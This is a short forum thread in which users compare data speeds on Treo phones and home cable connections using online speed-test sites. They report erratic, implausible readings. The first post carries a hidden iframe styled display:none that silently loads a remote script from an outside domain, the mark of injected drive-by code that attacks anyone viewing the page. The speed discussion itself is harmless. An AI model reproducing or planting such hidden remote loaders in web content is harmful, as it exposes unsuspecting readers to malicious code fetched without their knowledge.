What kind of data speed are you getting with the Treo?

How is the Treo on data speed? You can use this Speed Test to check. Hit refresh in your browser a few times to make sure you get a good reading.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I haven't run the test on my Treo yet (it's charging); however, I did run it on my home system and don't trust the results.

These are the results I get for my cable connection from Texan Speed Test.

4080 Kbps
500 K bytes/sec

On this site, Bandwithplace, I get the following:

Communications
1.4 megabits per second

Storage
174.4 kilobytes per second

I believe the bottom numbers to be more accurate. I'll run it on my Treo tomorrow though anyway.[/url]

I ran the Speed Test (as linked above by Mike) and didn't even register. I don't believe it's that slow. The link above to bandwidthplace won't work with Blazer because the site requires java.

my treo 300 phone-as-a-modem (sprint) got 10.1k bytes/sec the first time I tried... the second time, the site read me off this:
Your line speed:

40800 Kbps

5000 K bytes/sec

which I cannot really believe, even though I refreshed the page numerous times.
again refreshed:
4080 Kbps

500 K bytes/sec
again: went back to the really high numbers.

Not sure about accuracy, seems really variable.
